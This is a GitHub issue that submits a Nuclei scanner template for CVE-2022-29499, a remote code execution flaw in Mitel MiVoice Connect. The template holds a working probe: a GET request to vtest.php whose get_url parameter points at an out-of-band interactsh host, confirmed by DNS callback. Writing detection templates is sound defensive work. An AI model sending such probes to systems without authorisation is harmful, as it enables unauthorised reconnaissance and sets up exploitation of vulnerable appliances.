### ISSUE TITLE
CVE-2022-29499.yaml

### ISSUE THREAD

**Issue by 0xr2r** [projectdiscovery/nuclei-templates#9124]
### Template Information:

Hi, this template is not found in nuclei-templates. Please check and add it  CVE-2022-29499

### Nuclei Template:

```yaml
id: CVE-2022-29499

info:
  name: Mitel MiVoice Connect Remote Code Execution
  author: 0xr2r
  severity: critical
  description: |
    The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. The Service Appliances are SA 100, SA 400, and Virtual SA.
  reference:
    - https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-22-0002
    - https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/
    - https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
  metadata:
    verified: "true"
  tags: cve,cve2023,oast,rce,ssrf,mitel,mivoice

requests:
  - raw:
      - | # try resolve
        GET /scripts/vtest.php?get_url=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
```
